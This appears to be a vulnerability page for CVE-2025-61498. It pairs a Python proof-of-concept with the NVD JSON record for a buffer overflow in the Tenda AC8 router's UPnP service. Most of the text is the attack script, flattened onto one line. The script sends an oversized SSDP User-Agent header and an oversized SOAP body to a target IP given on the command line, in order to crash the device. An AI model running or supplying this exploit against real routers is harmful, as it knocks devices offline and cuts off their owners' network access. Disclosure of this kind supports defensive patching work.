CVE-2025-61498

import socket import sys # CVE-2025-61498 PoC - Tenda AC8 UPnP Buffer Overflow # Target: Tenda AC8 Router UPnP Service # Impact: Denial of Service def send_malicious_upnp_packet(target_ip, target_port=1900): """ Send a crafted SSDP M-SEARCH packet with oversized fields to trigger buffer overflow in UPnP service """ # Generate oversized string to trigger buffer overflow overflow_string = 'A' * 500 # Craft SSDP M-SEARCH request with overflow payload packet = f'M-SEARCH * HTTP/1.1\r\n' packet += f'HOST: {target_ip}:{target_port}\r\n' packet += f'ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n' packet += f'MAN: "ssdp:discover"\r\n' packet += f'MX: 3\r\n' packet += f'USER-AGENT: {overflow_string}\r\n\r\n' try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) sock.sendto(packet.encode(), (target_ip, target_port)) print(f'[+] Malicious packet sent to {target_ip}:{target_port}') print(f'[+] Overflow string length: {len(overflow_string)} bytes') sock.close() return True except Exception as e: print(f'[-] Error: {e}') return False def send_soap_overflow(target_ip, port=5000): """ Alternative: Send oversized SOAP request to UPnP control endpoint """ overflow_data = 'X' * 1000 soap_packet = f'POST /control/wan HTTP/1.1\r\n' soap_packet += f'Host: {target_ip}:{port}\r\n' soap_packet += f'SOAPACTION: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"\r\n' soap_packet += f'Content-Type: text/xml\r\n' soap_packet += f'Content-Length: {len(overflow_data)}\r\n\r\n' soap_packet += f'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">' soap_packet += f'<s:Body>{overflow_data}</s:Body></s:Envelope>' try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, port)) sock.send(soap_packet.encode()) print(f'[+] SOAP overflow packet sent to {target_ip}:{port}') sock.close() return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-61498-poc.py <target_ip>') sys.exit(1) target = sys.argv[1] print(f'[*] Targeting Tenda AC8 Router: {target}') print(f'[*] CVE-2025-61498 - UPnP Buffer Overflow PoC') # Method 1: SSDP overflow send_malicious_upnp_packet(target) # Method 2: SOAP overflow send_soap_overflow(target)

{"cve": {"id": "CVE-2025-61498", "sourceIdentifier": "[email protected]", "published": "2025-10-30T20:15:39.380", "lastModified": "2025-12-08T13:14:08.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow in the UPnP service of Tenda AC8 Hardware v03.03.10.01 allows attackers to cause a Denial of Service (DoS) via supplying a crafted packet."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac8_firmware:03.03.10.01:*:*:*:*:*:*:*", "matchCriteriaId": "594A855D-79FC-46A3-B74B-84E09454D783"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac8:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DE195347-1A3A-4547-84F7-B7F59A256EA4"}]}]}], "references": [{"url": "http://tenda.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/sakshi-garg02/CVEs/tree/main/CVE-2025-61498", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}